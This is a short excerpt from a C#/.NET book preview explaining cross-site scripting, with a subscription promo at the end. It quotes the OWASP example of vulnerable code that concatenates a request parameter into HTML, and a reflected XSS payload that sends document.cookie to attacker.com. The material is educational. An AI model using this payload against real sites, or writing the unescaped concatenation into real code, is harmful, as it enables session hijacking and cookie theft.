A3 – Cross-Site Scripting (XSS)

XSS is said to be one of the most problematic security issues due to the lack of knowledge about it and its lack of prevention among the developer's community.

This is quite simple in some of its implementations, though, and that's why it is so dangerous. There are three known forms of XSS attacks: stored, reflected, and DOM based.

One of the official examples of these attacks (reflected) presents the following code:

"<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

That is, the pages build an input field based on a request. Also, an attacker can modify the page in this way:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.

What happens? ...

Get Mastering C# and .NET Framework now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.